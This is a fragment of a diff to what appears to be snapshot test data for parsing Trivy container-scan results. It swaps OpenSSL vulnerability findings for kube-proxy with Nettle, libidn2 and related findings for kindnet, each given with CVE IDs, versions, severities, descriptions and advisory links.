"value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "http://support.apple.com/kb/HT5281", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "http://support.apple.com/kb/HT5501", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "http://support.apple.com/kb/HT6150", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "http://technet.microsoft.com/security/advisory/2588513", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "http://vnhacker.blogspot.com/2011/09/beast.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "value": "http://www.debian.org/security/2012/dsa-2398", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "value": "http://www.insecure.cl/Beast-SSL.rar", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "http://www.kb.cert.org/vuls/id/864643", }, { "type": "URL", - "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", + "value": "http://www.opera.com/docs/changelogs/mac/1151/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "http://www.opera.com/docs/changelogs/mac/1160/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "value": "http://www.opera.com/docs/changelogs/unix/1151/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "value": "http://www.opera.com/docs/changelogs/unix/1160/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "http://www.opera.com/docs/changelogs/windows/1151/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "http://www.opera.com/docs/changelogs/windows/1160/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "http://www.opera.com/support/kb/view/1004/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", - ], - }, - "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", + "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "http://www.securityfocus.com/bid/49388", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "http://www.securityfocus.com/bid/49778", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "http://www.securitytracker.com/id/1029190", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "http://www.securitytracker.com/id?1025997", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "http://www.securitytracker.com/id?1026103", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "http://www.securitytracker.com/id?1026704", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "http://www.ubuntu.com/usn/USN-1263-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://access.redhat.com/security/cve/CVE-2011-3389", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://hermes.opensuse.org/messages/13154861", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://hermes.opensuse.org/messages/13155432", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://ubuntu.com/security/notices/USN-1263-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2097", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20305", + "installedVersion": "3.4.1-1", + "packageName": "libhogweed4", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2097", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", - "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", - "https://linux.oracle.com/cve/CVE-2022-2097.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", - "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220715-0011/", - "https://security.netapp.com/advisory/ntap-20230420-0008/", - "https://ubuntu.com/security/notices/USN-5502-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2097", - "https://www.debian.org/security/2023/dsa-5343", - "https://www.openssl.org/news/secadv/20220705.txt", + "https://access.redhat.com/security/cve/CVE-2021-20305", + "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "https://linux.oracle.com/cve/CVE-2021-20305.html", + "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "https://security.gentoo.org/glsa/202105-31", + "https://security.netapp.com/advisory/ntap-20211022-0002/", + "https://ubuntu.com/security/notices/USN-4906-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "https://www.debian.org/security/2021/dsa-4933", ], }, "category": "Vulnerability", - "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "AES OCB fails to encrypt some bytes", + "name": "nettle: Out of bounds memory access in signature verification", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2097", + "value": "https://avd.aquasec.com/nvd/cve-2021-20305", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", + "value": "https://access.redhat.com/security/cve/CVE-2021-20305", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2097", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://security.gentoo.org/glsa/202105-31", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://ubuntu.com/security/notices/USN-4906-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://www.debian.org/security/2021/dsa-4933", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3580", + "installedVersion": "3.4.1-1", + "packageName": "libhogweed4", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-3580", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://linux.oracle.com/cve/CVE-2021-3580.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "https://security.netapp.com/advisory/ntap-20211104-0006/", + "https://ubuntu.com/security/notices/USN-4990-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3580", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://avd.aquasec.com/nvd/cve-2021-3580", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3580", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5502-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5343", + "value": "https://ubuntu.com/security/notices/USN-4990-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220705.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4304", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-12290", + "installedVersion": "2.0.5-1+deb10u1", + "packageName": "libidn2-0", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4304", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", - "https://linux.oracle.com/cve/CVE-2022-4304.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", - "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", - "https://ubuntu.com/security/notices/USN-5844-1", - 